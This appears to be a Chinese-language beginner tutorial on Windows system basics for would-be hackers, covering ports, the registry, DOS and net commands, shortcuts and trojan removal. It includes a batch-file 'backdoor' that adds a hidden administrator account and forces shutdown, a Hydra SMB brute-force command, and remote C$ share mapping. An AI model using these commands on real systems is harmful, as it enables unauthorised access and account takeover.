1、系統目錄、服務、端口、註冊表
2、黑客常用的DOS命令及批處理文件的編寫
3、黑客常用的快捷鍵。以及如何優化系統
4、登錄密碼破解、手動清除木馬病毒
5、配置黑客桌面、工作環境
1、系統目錄、服務、端口、註冊表
系統目錄:perflogs 是日誌目錄、windows、用戶目錄、程序安裝目錄(Program Files or Program Files(x86) )
Ps:某個程序想用戶一登錄就運行。把程序放在哪個目錄下?
服務:服務是一種應用程序類型,它在後臺運行。服務應用程序通常可以再本地和通過網絡爲用戶提供一些功能,例如:客戶端/服務器應用程序、WEB服務器、數據庫服務器以及其他基於服務的應用程序。
打開服務:右擊我的電腦打開“計算機管理”
Ctrl+r 打開運行
輸入services.msc 回車打開
作用:服務決定了計算機的一些功能是否被啓用
不同服務對應的功能不同
通過計算機提供的服務可以有小實現資源共享
常見服務:Web服務、Dns服務、Dhcp服務、郵件服務、Telnet服務、Ssh服務、ftp服務、Smb服務
端口:計算機“端口”是英文port的義譯,可以認爲是計算機與外界通訊交流的出口。按端口號可以分爲3大類:公認端口也叫知名端口(Well Known Ports);註冊端口(Registered Ports);動態和私有端口(Dynamic and/or Private Ports);
端口作用:區分服務
端口分類:
知名端口即衆所周知的端口號。範圍從0到1023,這些端口號一般固定分配給一些服務。比如:21端口分配給FTP服務,25端口分配給SMTP(簡單郵件傳輸協議)服務,80端口分配給HTTP服務,135端口分配給RPC(遠程過程調用)服務等等。
動態端口:範圍從1024到65535,這些端口號一般不固定分配給某個服務,也就是說許多服務都可以使用這些端口。只要運行的程序向系統提供出訪問網絡申請,那麼系統就可以從這些端口號中分配一個供改程序使用。比如:1024端口就是分配給第一個向系統發出申請的程序。在關閉程序進程後,就會釋放所佔用的端口號。
不過,動態端口也常常被病毒木馬程序所利用,如冰河默認連接端口號是7626、WAY2.4是8011、Netspy 3.0是7306、YAI病毒是1024等等。
常見端口:
HTTP協議代理服務器常用端口:80、8080、3128、8081、9080
FTP(文件傳輸)協議代理服務器常用端口:21
Telnet(遠程登錄)協議代理服務器常用端口:23
TFTP(Trival File Transfer Protocol)默認的端口號爲69/udp
SSH(安全登錄)、SCP(文件傳輸)、端口重定向,默認的端口號爲22/tcp
SMTP Simple Mail Transfer Protocol(E-mail),默認端口號爲25/tcp(木馬Antigen、Email Password Sender、Haebu Coceda、Shtniltz Stealth、WinPC、WinSpy都開放這個端口)
POP3 Post Office Protocol(E-mail),默認端口號爲110/tcp
Tomcat 默認端口號爲8080
Win2003遠程登錄,默認端口爲3389
Oracle 數據庫 默認端口爲 1521
MS SQL Server數據庫色server,默認端口爲1433/tcp 1433/udp
QQ 默認端口爲1080/udp
黑客通過端口可以幹什麼:
信息收集
目標探測
服務判斷
系統判斷:有的服務只有wins有。有的服務只有在linux 裏面有
系統角色分析
註冊表:
註冊表(Registry,繁體中文版windows稱之爲登錄檔)是Microsoft Windows 中的一個重要的數據庫。用於存儲系統和應用的設置信息,早在Windows 3.0推出OLE技術的時候,註冊表就已經出現。隨後推出的Windows NT 是第一個從系統級別廣泛使用註冊表的操作系統。但是,從Microsoft Windows 95開始。註冊表才真正的成爲Windows用戶經常接觸的內容,並在其後的操作系統中繼續沿用至今。
知識掌握:
打開註冊表: 在開始用輸入 regedit
註冊表的作用:註冊表是windows操作系統中的一個核心數據庫,其中存放着各種參數,直接控制着windows的啓動、硬件驅動程序的裝載以及一些Windows應用程序的運行,從而在整個系統中起着核心作用。這些作用包括了軟、硬件的相關配置和狀態信息,比如註冊表中保存有應用程序和資源管理器外殼的初始條件、首選項和卸載數據等,聯網計算機的整個系統的設置和各種許可,文件擴展名與應用程序關聯,硬件部件的描述、狀態、屬性,性能記錄和其他底層的系統狀態信息,以及其他數據等。
A:利用註冊表防病毒:不少計算機系統感染了網絡病毒後,可能會在這些註冊表中做修改:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (開機自動運行)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
B:病毒經常修改的註冊表鍵值
- IE起始頁面的修改
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 右半部分的
(2)Internet選項按鈕灰化&失效
(3)“源文件”項不可以用
(4)“運行”按鈕被取消&失效
常見5個註冊表:
- HKEY_CLASS_ROOT
管理文件系統。根據在Windows中安裝的應用程序的擴展名,該根鍵指明其文件類型的名稱,相應打開改文件所需要調用的程序等等信息。
2、HKEY_CURRENT_USER
管理系統當前的用戶信息。在這個根鍵中保存了本地計算機中存放的當前登錄的用戶信息,包括用戶登錄用戶名和暫存的密碼。在用戶登錄Windows98時,其信息從HKEY_USERS中相應的項拷貝到HKEY_CURRENT_USER中。
3、HKEY_LOCAL_MACHINE
管理當前系統硬件配置。在這個根鍵中保存了本地計算機硬件配置數據,此根鍵下的子關鍵字包括在SYUSTEM.DAT中,用來提供HKEY_LOCAL_MACHINE所需要的信息,或者在遠程計算機中可訪問的一組鍵中。
提權經常使用(讀vac 執行密碼 解密)
4、HKEY_USERS
管理系統的用戶信息。在這個根鍵中保存了存放本地計算機口令列表中的用戶標識和密碼列表。同時每個用戶的預配置信息都存儲在HKEY_USERS根鍵中,HKEY_USERS是遠程計算機中訪問的根鍵之一。
- HKEY_CURRENT_CONFIG
管理當前用戶的系統配置。在這個根鍵中保存這定義當前用戶桌面配置(如顯示器等信息)的數據,該用戶使用過的文檔列表(MRU),應用程序配置和其他關係當前用戶的Windows 98 中文版的安裝信息。
註冊表的結構:
利用註冊表防病毒:
入侵中常用的註冊表:
- 黑客常用的DOS命令及批處理文件的編寫
黑客常用的DOS命令
Color 改變cmd顏色
Ping -t -l 65550 ip : -l 指數據包大小 (ps:可以根據TTL判斷操作系統是什麼)
Ipconfig 查看IP
Ipconfig /release 自動獲取的IP的情況 清空IP
Ipconfig /renew 重新獲取IP
Systeminfo 查看系統信息,Windows中用於顯示關於計算機及其操作系統的詳細配置信息,包括操作系統配置、安全信息、產品 ID 和硬件屬性,如 RAM、磁盤空間和網卡和補丁信息等
ARP -a 查看所有局域網裏面的IP都顯示出來
Net view 查看所有局域網裏面的計算機名
Shutdown -s -t 180 -c “hacked by cracer” :-s 是關機 -r是重啓 -t是時間 -c 提示
Shutdown -a 是取消任務
Dir 查看目錄
Cd 切換目錄
Type 或者start seven.txt 打開seven.txt文件
Copy con c:\123.txt :在C盤下創建一個123.txt 寫完文件內容Ctrl+Z可以退出文件編輯
Md 目錄名 :創建目錄
Rd 123 刪除文件夾
Ren 原文件名 新文件名 重命名
Del 刪除文件
Copy 複製文件
Move 移動文件
Tree 樹形列出文件夾結構
Telnet
Net use k: \\192.168.80.137\c$ :把192.168.80.137的C盤映射成本地K盤
Net use k: \\192.168.80.137\c$ /del 刪除映射
Net start 查看開啓了那些服務
Net start 服務名 開啓服務:(如:net start telnet ,net start schedule)
Net stop 服務名 停止某服務
Net user 用戶名 密碼 /add :建立用戶
Net user guest /active:yes :激活guest用戶
Net user :查看有那些用戶
Net user 賬戶名 :查看賬戶的屬性
Net localGroup administrators 用戶名 /add :把”用戶”添加到管理員中使用管理員權限,注意:administrators 後面加s用複數
Net user guest 12345 :用guest用戶登錄後將密碼改爲12345
Net password 密碼 :更改系統登錄密碼
Net share :查看本地開啓的共享
Net share ipc$ :開啓ipc$共享
Net share ipc$ /del:刪除ipc$共享
Net share c$ /del: 刪除C:共享
Netstat -a :查看開啓那些端口,常用netstat -an
Netstat -n :查看端口的網絡連接情況,常用netstat -an
Netstat -v :查看正常運行的工作
At id號:開啓已經註冊的某個計劃任務
At /delete :停止所有計劃任務,用參數/yes則不需要確認就直接停止
At 查看所有的計劃任務
Attrib 文件名(目錄名) :查看某文件(目錄)的屬性
Attrib 文件名 -A -R -S -H或+A +R +S +H 去掉(添加)某文件的存檔、只讀、系統、隱藏屬性;用+則是添加爲某屬性。
Hydra 使用方法
--hydra -l 用戶名 -P 密碼字段 IP地址 smb
留後門:
寫批處理文件(dos下編寫)
批處理文件:是都是命令組合文件,寫在批處理文件的命令會別逐一制定。後綴名爲.bat
C:\>copy con c:\123.bat
net user cracer 123 /add
net localgroup administrators cracer /add
shutdown -s -t 180 -c "Hello man you are hacked by cracer"
3、黑客常用的快捷鍵。以及如何優化系統
Windows操作系統快捷鍵
F1 :顯示當前程序或者windows的幫助內容
F2 :當你選中一個文件的話。這意味着“重命名”
F3 :當你在桌面上的時候打開“查找:所有文件”對話框
CTRL+F4 :關閉當前應用程序中的當前文本(如word)
F5 :刷新
CTRL+F5 :強行刷新
CTRL+F6 :切還到當前應用程序中的下一個文本(加Shift可以跳到前一個窗口)
F10或ALT :激活當前程序的菜單欄
Windows鍵或者CTRL+ESC :打開開始菜單欄
CTRL+ALT+DELETE :在win9x中打開關閉程序對話框
DELETE :刪除被選擇的項目,如果是文件,將被放入回收站
SHIFT+DELETE :刪除被選擇的項目,如果是文件,將直接刪除而不是放入回收站
CTRL+N :新建一個新的文件
CTRL+O :打開“打開文件”對話框
CTRL+P :打開“打印”對話框
CTRL+S :保存當前操作的文件
CTRL+X :剪貼被選擇的項目到剪貼板
CTRL+INSERT 或者 CTRL+C :複製被選擇的項目到剪貼板
SHIFT+INSERT或者 CTRL+V :粘貼剪貼板中內容
ALT+BACKSPACE 或者CTRL+Z :撤銷上一步的操作
ALT+SHIFT+BACKSPACE :重做上一步被撤銷上午操作
Windows鍵+M :最小化所有被打開的窗口
Windows鍵+CTRL+M :重新將恢復上一項操作前窗口的大小和位置
Windows鍵+E :打開資源管理器
Windows鍵+F :打開“查找”所有文件
Windows鍵+R :打開“運行”對話框
Windows鍵+BREAK :打開“系統屬性”對話框
Windows鍵+CTRL+F :打開“查找:計算機”對話框
SHIFT+F10 :打開當前活動項目的快捷菜單
SHIFT :放入CD的時候按下不放,可以跳過自動播放CD。在打開word的時候按下不放,可以跳過自動啓動的宏。
ALT+F4 :關閉當前應用
ALT+SPACENAR :打開程序最上角的菜單
ALT+Tab :切還當前程序
ALT+ESC :切還當前程序
ALT+Enter :將Windows下運行的MSDOS窗口在窗口的全屏狀態間切還
Print+Screen :將當前屏幕以圖像方式拷貝到剪貼板
ALT+PrintScreen :將當前活動程序窗口圖像的方式拷貝的剪貼板
在IE中
ALT+Bight Arrow :顯示前一頁(前進鍵)
ALT+Left Arrow :顯示後一頁(後退鍵)
CTRL+Tab :在頁面上的各種框架中切還(加shift反方向)
系統優化
修改啓動項:打開“運行” (Win+R)在輸入msconfig
加快系統啓動速度:打開msconfig找到“引導”選擇(英文系統是Boot)。點擊“高級選擇”修改設置(處理器、內存等信息修改)。
提高窗口切還速度:有幾計算機屬性--性能信息和工具--調整視覺效果。先點擊讓Windows選擇計算機的最佳設置-->再點擊自定義-->把最後的勾選去掉-->確定
使用工具優化:
360安全衛士
魔方註冊表清理工具
魯大師
系統優化大師
4、登錄密碼破解、手動清除木馬病毒
使用啓動U盤破解
使用工具對hash值破解:lc5工具或者彩虹表
手動清除木馬:
查詢開機啓動項和註冊表:msconfig
查詢服務
查看網絡端口連接
5、配置黑客桌面、工作環境
雨滴桌面:
搭建網站:
多個IP 同一個端口創建多個網站
同一個IP 不用端口創建多個網站
不用的域名創建多個網站(DNS服務器的配置)
工具小旋風:小旋風放在網站根目錄下。實現多個網站目錄形式顯示出來,點擊後進入對應的網站頁面。